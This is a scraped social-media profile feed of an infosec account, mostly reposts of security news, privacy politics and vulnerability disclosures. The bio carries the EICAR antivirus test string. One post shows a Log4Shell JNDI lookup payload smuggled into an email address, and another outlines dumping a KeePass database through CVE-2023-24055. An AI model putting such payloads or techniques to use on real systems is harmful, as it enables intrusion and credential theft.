infosecatrandom's profile picture. Tor operator, privacy advocate, security geek. Also: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Infosec @ random

@infosecatrandom

Tor operator, privacy advocate, security geek. Also: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Infosec @ random reposted

Just a month later and... 🇪🇺 ChatControl is back! Now they're trying to pass an even more far reaching ChatControl law through the back door, in a form even more intrusive than the originally rejected plan, without needing any of the EU countries votes The new proposal: -…

levelsio's tweet image. Just a month later and...

🇪🇺 ChatControl is back!

Now they're trying to pass an even more far reaching ChatControl law through the back door, in a form even more intrusive than the originally rejected plan, without needing any of the EU countries votes

The new proposal:
-…

Freedom won today! 🚫 No ChatControl in EU Now keep this snooping on people's private messages off the 🇪🇺 EU's agenda forever please



Infosec @ random reposted

Read our latest crazy story on the spy who was so successful at pretending he's someone else that the GRU "killed off" his real persona and stranded him with the fake one. Once a fake environmental expert, now he's part of the Russia disinformation machine theins.ru/en/inv/286477


Infosec @ random reposted

💥 Wiz Research has uncovered a critical Redis vulnerability that's been hiding for 13 years We found RediShell (CVE-2025-49844): an RCE bug in Redis that affects every version of Redis out there. It's rated CVSS 10 - the highest severity possible. The vulnerability lets…

wiz_io's tweet image. 💥 Wiz Research has uncovered a critical Redis vulnerability that's been hiding for 13 years

We found RediShell (CVE-2025-49844): an RCE bug in Redis that affects every version of Redis out there. It's rated CVSS 10 - the highest severity possible.

The vulnerability lets…

Infosec @ random reposted

Until now, if you lost or broke your phone, your Signal message history was *gone,* a real challenge for everyone whose most important conversations happen in Signal. So, with careful design and development, we’re rolling out opt-in secure backups. signal.org/blog/introduci…


Infosec @ random reposted

TIL that some ipcams that can be found on shodan allow scanning for wifi access points without authentication ....

evilsocket's tweet image. TIL that some ipcams that can be found on shodan allow scanning for wifi access points without authentication ....

Infosec @ random reposted

Russia’s Most Secretive FSB’s Spy Network Unmasked by Souvenir Badges Sold Online — UNITED24 Media united24media.com/latest-news/ru…


Infosec @ random reposted

I've discovered via code review: 2 zero-click RCE logic bugs in Linux kernel Bluetooth & userspace (late 2024). Exploitable to register rogue HID w/o auth. One allows bonding w/o confirmation, bypassing CVE-2023-45866 @marcnewlin patch. Details: ubuntu.com/security/CVE-2…


Infosec @ random reposted

Run a Linux virtual machine in your browser,no server needed

tom_doerr's tweet image. Run a Linux virtual machine in your browser,no server needed

Infosec @ random reposted

🧵 THREAD: A federal whistleblower just dropped one of the most disturbing cybersecurity disclosures I’ve ever read. He's saying DOGE came in, data went out, and Russians started attempting logins with new valid DOGE passwords Media's coverage wasn't detailed enough so I dug…

mattjay's tweet image. 🧵 THREAD: A federal whistleblower just dropped one of the most disturbing cybersecurity disclosures I’ve ever read.

He's saying DOGE came in, data went out, and Russians started attempting logins with new valid DOGE passwords

Media's coverage wasn't detailed enough so I dug…

Infosec @ random reposted

T3S3 adds LoRa Voice Communication Kit lilygo.cc/products/t3-s3…

lilygo9's tweet image. T3S3 adds LoRa Voice Communication Kit
lilygo.cc/products/t3-s3…

The ESP32 “backdoor” mentioned in the article from Bleepingcomputer is another Nothingburger. Rob is correct.

It's not a "backdoor". It's just low-level access to the device.



Infosec @ random reposted

Microsoft just released an impressive tool OmniParser V2 can turn any LLM into an agent capable of using a computer 🔥 You can enable GPT-4o, DeepSeek R1, Sonnet 3.5, Qwen... to understand what's on your screen and take actions. 100% free & open source

From AK

Infosec @ random reposted

This has been one of my favorites for a while, but now it's time to let it go. Here's my preferred way of getting the KeePass db that we often hunt for: downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.…


Infosec @ random reposted

This is awesome: wrap @cloudflare around your site & they can now automatically hit @haveibeenpwned's Pwned Passwords during a login attempt, check it against our DB (among others) and pass a request header to the origin if the password has been breached blog.cloudflare.com/a-safer-intern…


Infosec @ random reposted

#GSM security: A5/4 was approved by 3GPP together with A5/3 (2009), but most vendors were lazy to change from 64 to 128bit keys on both UE and network side. A5/2 and A5/1 lessons were not enough to prevent history repeating: iacr.org/cryptodb/data/… iacr.org/submit/files/s…


Infosec @ random reposted

🚀 Introducing getpiped.py: Your ultimate tool for testing curl/wget piping scenarios! 🌐💻 🔍 Explore a variety of script execution methods: curl/wget | bash 📜🔧 Process substitution 🔄 Here-strings 📥 Temporary files 📝 Base64 encoding 🔑 Compressed data 📦 Run…

M_haggis's tweet image. 🚀 Introducing getpiped.py: Your ultimate tool for testing curl/wget piping scenarios! 🌐💻

🔍 Explore a variety of script execution methods:

curl/wget | bash 📜🔧
Process substitution 🔄
Here-strings 📥
Temporary files 📝
Base64 encoding 🔑
Compressed data 📦

Run…

Infosec @ random reposted

For educational purposes only: test+(${jndi:ldap://test/a})@gmail.com is a valid RFC822 Email Address 😅


Infosec @ random reposted

Stop what you're doing and read this. This leak is going to be the story of the year: (LINK: theguardian.com/world/2021/jul…)

Snowden's tweet image. Stop what you're doing and read this. This leak is going to be the story of the year: (LINK: theguardian.com/world/2021/jul…)

Loading...

Something went wrong.


Something went wrong.